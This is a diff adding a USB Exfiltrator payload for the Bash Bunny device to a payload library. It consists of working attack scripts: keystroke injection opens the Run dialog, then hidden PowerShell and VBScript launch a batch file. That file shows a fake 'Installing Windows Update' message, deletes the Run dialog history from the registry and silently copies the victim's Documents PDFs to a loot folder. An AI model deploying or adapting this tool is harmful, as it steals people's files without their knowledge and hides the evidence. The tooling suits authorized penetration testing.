USB Exfiltrator

payloads/library/usb_exfiltrator/d.cmd

@@ -0,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+cscript %~d0\i.vbs %~d0\e.cmd
+@exit

payloads/library/usb_exfiltrator/e.cmd

@@ -0,0 +1,29 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+set dst=%~d0\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+REM Same as above but does not create empty directories
+xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
+)
+
+REM Blink CAPSLOCK key
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit

payloads/library/usb_exfiltrator/i.vbs

@@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

payloads/library/usb_exfiltrator/install.sh

@@ -0,0 +1,8 @@
+LED R G
+PAYLOADDIR=$(find /root/udisk/payloads/ -name d.cmd -printf '%h\n')
+cd $PAYLOADDIR
+mv d.cmd e.cmd i.vbs /root/udisk/
+sync
+LED R G B 30
+sleep 2
+exit 0

payloads/library/usb_exfiltrator/payload.txt

@@ -0,0 +1,19 @@
+#!/bin/bash
+#
+# Title:         USB Exfiltration
+# Author:        Hak5Darren
+# Version:       1.0
+# Target:        Windows XP SP3+
+# Props:         Diggster
+# 
+# Executes d.cmd from the root of the Bash Bunny USB Disk partition,
+# which in turn executes e.cmd invisibly using i.vbs
+# which in turn copies documents to the loot folder on the Bash Bunny.
+#
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'d.cmd')"
+QUACK ENTER
+LED G

payloads/library/usb_exfiltrator/readme.md

@@ -0,0 +1,23 @@
+# Exfiltrator for Bash Bunnys
+
+* Author: Hak5Darren
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Exfiltrates files from the users Documents folder
+Saves to the loot folder on the Bash Bunny USB Mass Storage partition named by the victim hostname, date and timestamp.
+
+## Configuration
+
+By default the staged payload exfiltrates PDF files. Change the xcopy commands from e.cmd to your liking.
+
+## STATUS
+
+| LED                | Status                                       |
+| --------==-------- | -------------------------------------------- |
+| Amber              | Installing e.cmd d.cmd and i.vbs to USB Disk |
+| White (blinking)   | Setup Failed. Target didn't obtain IP        |
+| Red                | Attack Setup                                 |
+| Green              | Attack Complete                              |